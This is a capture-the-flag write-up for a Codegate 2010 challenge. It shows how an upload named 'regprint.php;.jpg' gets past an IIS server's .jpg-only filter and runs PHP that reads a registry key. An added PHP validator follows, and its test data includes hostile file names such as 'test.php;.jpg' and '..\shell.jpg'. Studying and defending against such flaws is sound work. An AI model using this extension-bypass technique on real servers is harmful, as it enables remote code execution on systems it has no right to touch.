Summary

http://ctf6.codegate.org/31337_/index.html

Get the value of HKLM\Software\codegate2010; it's the flag.

Analysis

At first, when accessing the URL, it shows a page that allows you to upload a JPEG image, and only .jpg files. As I noticed, it is served by IIS. Suddenly, I remembered the vulnerability of IIS in processing image files. A little bit of googling showed me the result. Ah ha, let's test it by uploading a PHP file like "test.php;.jpg". Incredible!

Now, the only thing we have to do is write a few lines of PHP to read the registry key.

regprint.php;.jpg
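<?php
// Windows Script Host COM object; it exposes RegRead for registry access.
$shell = new COM("WScript.Shell") or die("Requires Windows Scripting Host");
// Read the value that holds the flag.
$devenvpath = $shell->RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\codegate2010");
echo $devenvpath;
?>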

Then, execute it by requesting http://ctf6.codegate.org/31337_/upload/regprint.php;.jpg

LollerSkaterz_From_RoflCopters_With_Guinness

Easy game with 1200 points.

Vulnerability

In fact, after the game thaidn said that it was a fault in deploying the challenge; it was designed to be passed with a 0-day in core PHP.
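The upload form accepted "test.php;.jpg" because the name ends in .jpg. As an added example (not code from the challenge or from the original write-up), this is how an upload handler can refuse such names, check the content, and store the file under a name the client does not control. The function names, the 64-character stem limit and the sample uploads are assumptions made for the illustration.

```php
<?php
// Added example (not from the challenge): decide the stored name server-side
// so a client-supplied name like "test.php;.jpg" never reaches the web root.

/** Return null if the name is acceptable, else the reason it is rejected. */
function reject_reason(string $clientName): ?string
{
    $base = basename(str_replace('\\', '/', $clientName));
    if ($base !== $clientName) {
        return 'path components in name';
    }
    // Plain stem, exactly one dot, .jpg/.jpeg suffix: no ';', no second extension.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.jpe?g$/i', $base)) {
        return 'name is not <stem>.jpg';
    }
    return null;
}

/** True when the content starts with the JPEG SOI marker (FF D8 FF). */
function looks_like_jpeg(string $bytes): bool
{
    return strncmp($bytes, "\xFF\xD8\xFF", 3) === 0;
}

/** Name to store under: random, never derived from client input. */
function stored_name(): string
{
    return bin2hex(random_bytes(16)) . '.jpg';
}

// Constructed sample uploads: [client file name, first bytes of the content].
$samples = [
    ['holiday.jpg',       "\xFF\xD8\xFF\xE0\x00\x10JFIF"],
    ['test.php;.jpg',     "<?php echo 1; ?>"],
    ['regprint.php;.jpg', "\xFF\xD8\xFF\xE0<?php"],
    ['..\\shell.jpg',     "\xFF\xD8\xFF\xE0"],
    ['notes.jpg',         "plain text"],
];

foreach ($samples as [$name, $bytes]) {
    $why = reject_reason($name) ?? (looks_like_jpeg($bytes) ? null : 'content is not JPEG');
    printf("%-20s %s\n", $name, $why === null ? 'store as ' . stored_name() : "reject: $why");
}
```

The third sample shows why the content check alone is not enough: the bytes start like a JPEG, and only the name check stops it. Serving the upload directory with script execution disabled removes the remaining dependence on how the server parses file names.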
